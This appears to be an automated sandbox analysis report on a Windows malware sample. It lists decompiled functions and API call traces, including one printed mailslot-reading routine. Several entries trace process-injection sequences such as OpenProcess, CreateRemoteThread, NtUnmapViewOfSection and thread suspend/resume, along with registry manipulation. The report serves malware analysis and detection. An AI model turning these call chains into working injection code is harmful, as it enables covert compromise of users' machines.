Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
